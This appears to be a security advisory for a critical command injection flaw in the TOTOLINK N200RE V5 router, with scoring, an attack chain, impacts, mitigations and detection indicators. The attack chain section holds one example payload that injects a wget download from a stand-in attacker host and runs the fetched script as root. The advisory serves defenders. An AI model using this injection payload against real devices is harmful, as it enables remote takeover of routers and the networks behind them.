Executive Summary
A critical command injection vulnerability (CVE-2026-36841) has been disclosed in the TOTOLINK N200RE V5 router. The flaw exists in the formMapDelDevice function, where the macstr and bandstr parameters are passed to system commands without proper sanitization. With a CVSS score of 9.8 (Critical), this vulnerability enables unauthenticated remote code execution with no user interaction required.
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
TOTOLINK N200RE V5 is a consumer and small-business Wi-Fi router. Routers of this type are frequently exposed directly to the internet or used in home office environments with minimal network segmentation, making this vulnerability particularly dangerous to end users.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-36841 |
| CVSS Score | 9.8 (Critical) |
| Type | Command Injection (OS Command Injection) |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Scope | Unchanged |
| Confidentiality / Integrity / Availability | High / High / High |
| Published | 2026-04-29 |
| Affected Component | formMapDelDevice function |
| Vulnerable Parameters | macstr, bandstr |
Affected Products
| Product | Version | Status |
|---|---|---|
| TOTOLINK N200RE | V5 | Vulnerable — patch status unknown |
Technical Details
What Is a Command Injection Vulnerability?
A command injection flaw occurs when user-supplied input is incorporated into an OS-level command without adequate sanitization or escaping. An attacker can inject additional shell commands using metacharacters (;, |, &&, `), which the underlying shell then executes with the privileges of the vulnerable application — often root in the case of embedded router firmware.
Vulnerable Function: formMapDelDevice
The formMapDelDevice function in the TOTOLINK N200RE V5 firmware handles the deletion of devices from a network map. Both the macstr and bandstr parameters accept user-controlled input that is concatenated into shell commands without sanitization.
Attack Chain
1. Attacker identifies TOTOLINK N200RE V5 accessible on the network
2. Attacker crafts an HTTP request to the formMapDelDevice endpoint
3. Malicious payload injected into macstr or bandstr parameter:
e.g., macstr=AA:BB:CC:DD:EE:FF;wget http://attacker.com/shell.sh -O /tmp/shell.sh;sh /tmp/shell.sh
4. Router firmware executes the injected commands as root
5. Attacker achieves full persistent control over the device
6. Attacker pivots to devices on the LAN or modifies DNS/routing tablesWhy CVSS 9.8?
The near-maximum score reflects: no authentication required, no user interaction, network accessibility, and low attack complexity. All three impact dimensions (Confidentiality, Integrity, Availability) are rated High, as full RCE gives an attacker unrestricted access to the device and the network behind it.
Impact Assessment
| Impact Area | Description |
|---|---|
| Remote Code Execution | Full code execution on the router as root |
| Network Pivoting | Attacker gains foothold inside the LAN |
| DNS Hijacking | Modify upstream DNS to redirect traffic or enable phishing |
| Credential Theft | Intercept unencrypted network traffic from LAN clients |
| Botnet Recruitment | Router added to a botnet for DDoS, spam, or proxy services |
| Persistent Backdoor | Attacker installs persistent implant in router firmware |
| Traffic Interception | Man-in-the-middle attacks against LAN devices |
Recommendations
Immediate Actions
- Check your router model and firmware version — Determine if your TOTOLINK N200RE is running V5 firmware
- Check for a firmware update — Visit the TOTOLINK support portal for any available patches for the N200RE V5
- Disable remote management — Ensure the router's web interface is not accessible from the WAN/internet side
- Place behind a firewall — If the router must remain in service, ensure it is not directly internet-exposed
Network-Level Mitigations
- Block inbound access to the router's web management interface from external IPs
- Restrict LAN-side access to the admin interface to specific trusted IP addresses
- Consider placing the router behind an upstream firewall that filters inbound connections
- Monitor outbound connections from the router for unexpected destinationsLonger-Term Recommendations
- Replace the device if no firmware patch is released in a reasonable timeframe — TOTOLINK N200RE V5 may be end-of-life
- Upgrade to a supported router from a vendor with a track record of security patching
- Segment your network — Isolate IoT and consumer devices from workstations and servers
- Enable router logging and monitor for unusual processes or outbound traffic
Detection Indicators
| Indicator | Description |
|---|---|
| Unexpected outbound connections from the router | Possible C2 or exfiltration |
| DNS resolution changes on LAN clients | Potential DNS hijack via compromised router |
| New admin accounts on the router | Post-exploitation persistence mechanism |
| Unusual CPU/memory usage on the router | May indicate cryptominer or botnet activity |
HTTP requests to formMapDelDevice with shell metacharacters | Active exploitation attempt |
Post-Remediation Checklist
- Confirm firmware patched or device replaced
- Reset router to factory defaults after patching — existing compromise may persist
- Change all admin credentials after reset
- Review LAN devices for signs of compromise resulting from router control
- Update DNS settings on all LAN clients to ensure they point to trusted resolvers
- Monitor network traffic for anomalies for at least 30 days post-remediation